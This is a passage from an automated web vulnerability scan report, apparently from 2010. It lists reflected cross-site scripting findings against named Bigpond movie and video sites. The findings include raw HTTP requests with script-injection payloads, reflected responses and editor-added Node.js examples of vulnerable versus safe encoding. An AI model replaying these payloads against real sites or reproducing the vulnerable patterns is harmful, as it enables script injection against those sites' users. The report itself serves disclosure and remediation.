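  if (!/^-?\d{1,15}$/.test(raw)) {
    throw new RangeError('not an integer: ' + JSON.stringify(raw));
  }
  return String(Number(raw));
}

// Stand-alone demonstration.
console.log(npuCheckVulnerable(PAYLOAD));   // payload survives intact
console.log(npuCheckSafe('1'));             // if(1==1)strNPU=...
try { npuCheckSafe(PAYLOAD); } catch (e) { console.log(e.message); }
```

Validation at the type level is the only defence that works for this sink; it also has to run before the value is stored or forwarded, since the same string is reflected by the ad server into third-party pages, which is the cascade the head of this report describes.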

2.519. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/161286/Too-Late-To-Say-Goodbye

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e0d1"%3b5c0f2728282 was submitted in the REST URL parameter 2. This input was echoed as 7e0d1";5c0f2728282 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dvd/7e0d1"%3b5c0f2728282/Too-Late-To-Say-Goodbye?a=15401&utm_source=promotile100x70&utm_medium=online&utm_campaign=bpcomtile&cid=ZBP_MOV_Too-Late-To-Say-Goodbye_100x70_231110 HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:40:08 GMT
Server: Apache
Set-Cookie: subscriber=c763f71518c6e5328f48bfc68127e54f; path=/
Set-Cookie: cobrand=deleted; expires=Mon, 23-Nov-2009 03:40:08 GMT; path=/
Set-Cookie: voucherId=15401; expires=Tue, 30-Nov-2010 03:40:08 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
rop11="Non-Registered-Movies-DVD";
s.eVar25="";
/**Page Settings**/

s.prop4='DVD';
s.prop5='Product View';
s.pageName="BP:Movies DVD:DVD:Product View";
s.events="prodView";
s.products=";BP:DVD-7e0d1";5c0f2728282";
s.prop36="Not Recommended-View";
s.eVar36="Not Recommended-View";
/**Global Footer Settings **/
s.hier1= s.prop1;
if (s.prop2) s.hier1 += '|' + s.prop2;
if (s.prop3) s.hier1 += '|' + s.prop3;

...[SNIP]...
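
The six bigpondvideo.com findings (2.511 to 2.516) and the s.products assignment in 2.519 (repeated for a second title in 2.523) are one sink class: user data concatenated into a JavaScript string literal inside an inline script. The Node.js example below is added by the editor and is not code from the report or from either site; the builder functions are hypothetical stand-ins for the server-side template that produced the FlashVars argument, and the sample parameters are the scanner payloads copied from the report, used as constructed input. It shows why escaping the quote character alone would not have been enough (a `</script>` in the data ends the script element before the JavaScript parser ever runs) and gives an encoder that is safe for both the single-quoted FlashVars string and the double-quoted s.products string.

```javascript
// Added example (not from the original report): a JavaScript string-literal
// sink inside an inline <script>, modelled on the FlashVars argument from
// findings 2.511 to 2.516. Two independent things go wrong on the page:
//   1. a quote in the data terminates the string literal;
//   2. "</script>" in the data terminates the <script> element itself, so
//      the HTML parser hands control back before any JS-level escaping of
//      the quote matters.

// Constructed inputs: payloads copied from findings 2.511 and 2.512.
const PAYLOAD_NAME = '519fd</script><script>alert(1)</script>c34c16aedfb';
const PAYLOAD_REF = 'Net-Head-TV-Sport-Racinge27dc</script><script>alert(1)</script>1c3586a0fb8';

// Vulnerable: mirrors the observed output, raw key/value pairs inside a
// single-quoted literal.
function buildFlashVarsVulnerable(params) {
  const pairs = Object.entries(params).map(([k, v]) => k + '=' + v);
  return "'FlashVars','" + pairs.join('&') + "'";
}

// Layer 1 (URL context): percent-encode every name and value. This removes
// '<', '>', '"', '&' and '=' from the data, so neither the query structure
// nor the <script> element can be broken. Note that encodeURIComponent
// leaves the apostrophe alone, so on its own this would not protect the
// single-quoted literal the page uses.
function encodeQuery(params) {
  return Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
}

// Layer 2 (JS context): emit a proper literal. JSON.stringify produces a
// double-quoted literal with '"' and '\' escaped; the extra replacements
// cover what is still dangerous inside an HTML <script> body: angle
// brackets (so "</script>" and "<!--" cannot appear) and U+2028/U+2029,
// which older engines treat as line terminators even inside a literal.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function buildFlashVarsSafe(params) {
  return "'FlashVars'," + jsStringLiteral(encodeQuery(params));
}

// The property that matters for the script context, checked the way the
// HTML tokenizer does it: case-insensitive, no closing tag anywhere.
function closesScript(fragment) {
  return /<\/script/i.test(fragment);
}

// Stand-alone demonstration.
const params = { [PAYLOAD_NAME]: '1', ref: PAYLOAD_REF, channelId: '105' };
console.log(buildFlashVarsVulnerable(params)); // contains </script><script>alert(1)
console.log(buildFlashVarsSafe(params));       // no '<' at all; a valid JS literal
```

Both layers map directly onto PHP, which is what the responses advertise: rawurlencode() for the query pairs and json_encode() with JSON_HEX_TAG for the literal. The JSON_HEX_* flags arrived in PHP 5.3, so the PHP 5.2.13 shown in the response headers would need the angle brackets replaced by hand as above.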

2.520. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/161286/Too-Late-To-Say-Goodbye

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a499"><a>b747d287eda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dvd/1a499"><a>b747d287eda/Too-Late-To-Say-Goodbye?a=15401&utm_source=promotile100x70&utm_medium=online&utm_campaign=bpcomtile&cid=ZBP_MOV_Too-Late-To-Say-Goodbye_100x70_231110 HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:39:44 GMT
Server: Apache
Set-Cookie: subscriber=627167c3b053d9adccbb197c95136aaa; path=/
Set-Cookie: cobrand=deleted; expires=Mon, 23-Nov-2009 03:39:44 GMT; path=/
Set-Cookie: voucherId=15401; expires=Tue, 30-Nov-2010 03:39:44 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
<link rel="canonical" href="http://dvd.bigpondmovies.com/dvd/1a499"><a>b747d287eda/Too+Late+To+Say+Goodbye" />
...[SNIP]...

2.521. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/161286/Too-Late-To-Say-Goodbye

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c378"><img%20src%3da%20onerror%3dalert(1)>bd79f83f7c0 was submitted in the REST URL parameter 2. This input was echoed as 5c378"><img src=a onerror=alert(1)>bd79f83f7c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /dvd/5c378"><img%20src%3da%20onerror%3dalert(1)>bd79f83f7c0/Too-Late-To-Say-Goodbye HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:50:14 GMT
Server: Apache
Cache-Control:
Expires:
Pragma:
Etag: "144d1310ed263ac7711d9ca10630c7bc"
Set-Cookie: subscriber=03fd168c6ff1d61bb0632ea78d363e6e; path=/
Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:14 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
<link rel="canonical" href="http://dvd.bigpondmovies.com/dvd/5c378"><img src=a onerror=alert(1)>bd79f83f7c0/Too+Late+To+Say+Goodbye" />
...[SNIP]...

2.522. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/161286/Too-Late-To-Say-Goodbye

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5fe"><img%20src%3da%20onerror%3dalert(1)>d6bb661fb53 was submitted in the REST URL parameter 3. This input was echoed as 3f5fe"><img src=a onerror=alert(1)>d6bb661fb53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /dvd/161286/Too-Late-To-Say-Goodbye3f5fe"><img%20src%3da%20onerror%3dalert(1)>d6bb661fb53 HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:50:54 GMT
Server: Apache
Cache-Control:
Expires:
Pragma:
Etag: "6716df96dbbb698ece680db9fd5ebd88"
Set-Cookie: subscriber=349625a2be2958ca9dbe8fd31a8f6d47; path=/
Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:54 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
<link rel="canonical" href="http://dvd.bigpondmovies.com/dvd/161286/Too+Late+To+Say+Goodbye3f5fe"><img src=a onerror=alert(1)>d6bb661fb53" />
...[SNIP]...

2.523. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03!

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80db7"%3b4b75db6127e was submitted in the REST URL parameter 2. This input was echoed as 80db7";4b75db6127e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dvd/80db7"%3b4b75db6127e/Secret-Diary-Of-A-Call-Girl-Series-03! HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:50:08 GMT
Server: Apache
Cache-Control:
Expires:
Pragma:
Etag: "7695f7ac93f932bc1fb7bdf490b1ad52"
Set-Cookie: subscriber=fd5c0374efa206641dad4393804454b7; path=/
Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:08 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
rop11="Non-Registered-Movies-DVD";
s.eVar25="";
/**Page Settings**/

s.prop4='DVD';
s.prop5='Product View';
s.pageName="BP:Movies DVD:DVD:Product View";
s.events="prodView";
s.products=";BP:DVD-80db7";4b75db6127e";
s.prop36="Not Recommended-View";
s.eVar36="Not Recommended-View";
/**Global Footer Settings **/
s.hier1= s.prop1;
if (s.prop2) s.hier1 += '|' + s.prop2;
if (s.prop3) s.hier1 += '|' + s.prop3;

...[SNIP]...

2.524. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03!

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e44"%20style%3dx%3aexpression(alert(1))%2087a7b1443b1 was submitted in the REST URL parameter 2. This input was echoed as 64e44" style=x:expression(alert(1)) 87a7b1443b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dvd/64e44"%20style%3dx%3aexpression(alert(1))%2087a7b1443b1/Secret-Diary-Of-A-Call-Girl-Series-03! HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:50:05 GMT
Server: Apache
Cache-Control:
Expires:
Pragma:
Etag: "32cb0d8aaa4df4c43e6d0a15acd75744"
Set-Cookie: subscriber=57926fbbde89cf34fa78b7abad47dbbf; path=/
Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:05 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 70925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
<link rel="canonical" href="http://dvd.bigpondmovies.com/dvd/64e44" style=x:expression(alert(1)) 87a7b1443b1/Secret+Diary+Of+A+Call+Girl+Series+03!" />
...[SNIP]...

2.525. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.bigpondmovies.com
Path:   /dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03!

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8336"><img%20src%3da%20onerror%3dalert(1)>2c023b98a32 was submitted in the REST URL parameter 3. This input was echoed as d8336"><img src=a onerror=alert(1)>2c023b98a32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03!d8336"><img%20src%3da%20onerror%3dalert(1)>2c023b98a32 HTTP/1.1
Host: dvd.bigpondmovies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:50:33 GMT
Server: Apache
Cache-Control:
Expires:
Pragma:
Etag: "1e159a70a86388ff6a73c9f5fac96d4a"
Set-Cookie: subscriber=0730c94f0d19a54b758b4cc22399037b; path=/
Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:33 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 72322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<
...[SNIP]...
<link rel="canonical" href="http://dvd.bigpondmovies.com/dvd/177305/Secret+Diary+Of+A+Call+Girl+Series+03!d8336"><img src=a onerror=alert(1)>2c023b98a32" />
...[SNIP]...

2.526. http://iad.bigpondvideo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c29c1</script><script>alert(1)</script>cbeed6bfae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c29c1</script><script>alert(1)</script>cbeed6bfae2=1 HTTP/1.1
Host: iad.bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:38:59 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb37535f9b7&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&c29c1</script><script>alert(1)</script>cbeed6bfae2=1&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.527. http://iad.bigpondvideo.com/indexInfinityPlayer.php [allowOverlays parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the allowOverlays request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d233a</script><script>alert(1)</script>38d32f44ab8 was submitted in the allowOverlays parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1d233a</script><script>alert(1)</script>38d32f44ab8&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:08 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1d233a</script><script>alert(1)</script>38d32f44ab8&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth="+screen.width+
...[SNIP]...

2.528. http://iad.bigpondvideo.com/indexInfinityPlayer.php [allowPreBuffer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the allowPreBuffer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 544a9</script><script>alert(1)</script>a4ed5b9946f was submitted in the allowPreBuffer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0544a9</script><script>alert(1)</script>a4ed5b9946f&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:28 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
yle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0544a9</script><script>alert(1)</script>a4ed5b9946f&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=i
...[SNIP]...

2.529. http://iad.bigpondvideo.com/indexInfinityPlayer.php [autoStart parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the autoStart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13481</script><script>alert(1)</script>3a8131221a8 was submitted in the autoStart parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=013481</script><script>alert(1)</script>3a8131221a8&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:57 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
